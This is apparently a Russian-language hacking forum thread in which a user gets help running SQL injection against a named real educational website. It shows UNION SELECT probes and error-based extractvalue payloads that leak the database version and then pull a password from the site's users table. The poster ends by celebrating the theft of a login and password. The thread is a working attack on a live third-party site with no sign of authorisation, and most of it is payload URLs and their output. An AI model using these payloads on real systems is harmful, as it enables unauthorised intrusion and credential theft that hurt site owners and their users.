Помощь в SQL Injection

Помогите доделать инъекцию сайта: http://worldwidestudies.org/ua/step/item/id/1
Вот что мне удалось проделать:
http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT 1,2,3,4,5,6,7 --
Но никакие цифры не отображаются на сайте, но увидел что вместо "01 Вибір програми" отображается "{number} {title}", пробую писать следующее:
http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT TABLE_NAME,2,3,4,5,6,7 FROM INFORMATION_SCHEMA.TABLES --
но сайт отображается как и раньше, вот и застрял на етом етапе, что делать не знаю, может здесь нет инъекции? А если есть, подскажите в каком направлении двигатся.

 

попробуйте error-based

Code:

http://worldwidestudies.org/ua/step/item/id/1+and(extractvalue(1,concat(0x3a,version())))

 

Ето мы только что увидили какая версия БД используется?(XPATH syntax error: ':5.5.38')
И скинь мануал плз если есть на "ерор-базед", а то здесь нет: https://rdot.org/forum/showthread.php?t=124

И только что увидел вот: http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT 1,2,3,4,5,6,7 FROM users --
Нашел что есть таблица с именем "users".

И нашел что есть столбцы(login,password): http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT login,2,3,4,5,6,7 FROM users --
и вместо "login" можно еще постовить "password" и не выдает ошибки, но ошибки выдает когда пытаюсь вывести ето все на екран, вот таким образом: http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT login,2,3,4,5,6,7 FROM users LIMIT 0,1 --
И на етом етапе застрял...

 

Code:

http://worldwidestudies.org/ua/step/item/id/1+and(extractvalue(1,concat(0x3a,(select%20password%20from%20users%20limit%200,1))))

статей нет. тут вся суть в векторе и запросе, который вам нужен.

 

епать.... нету слов, моя первая инъекция, канешн не без помощи, нашел и логин - методом подстановки. Спасибо!